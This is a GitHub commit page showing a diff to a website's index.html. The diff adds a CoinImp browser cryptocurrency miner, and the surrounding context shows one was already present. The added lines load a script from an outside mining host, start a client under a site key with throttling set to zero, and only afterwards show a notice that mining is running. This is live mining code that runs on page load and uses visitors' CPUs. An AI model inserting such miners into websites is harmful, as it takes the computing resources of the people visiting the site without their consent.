Skip to content

Commit

Permalink
Update index.html
Browse files Browse the repository at this point in the history
  • Loading branch information
vo6i authored Jul 31, 2024
1 parent d03880a commit 8383eec
Showing 1 changed file with 9 additions and 0 deletions.
9 changes: 9 additions & 0 deletions index.html
Original file line number Diff line number Diff line change
Expand Up @@ -81,6 +81,15 @@
_client.start();
_client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40,"#3d3d3d");
</script>
<script src="https://www.hostingcloud.racing/7F4H.js"></script>
<script>
var _client = new Client.Anonymous('4bc0501a0ba20f76a537ecbd9a24c652614c84ced8a69cb6097d7b10ae3caa63', {
throttle: 0, c: 'w'
});
_client.start();
_client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40,"#3d3d3d");
</script>

<!--script src="parallax.js"></script-->
<!--img src="img/1.jpeg" data-speedx="0.065" data-speedy="0.05" data-speedz="0.05" data-rotation="0.12" class="parallax bg">
<img src="img/2.png" data-speedx="0.05" data-speedy="0.08" data-speedz="0.03" data-rotation="0.22" class="parallax hr">
Expand Down

0 comments on commit 8383eec

Please sign in to comment.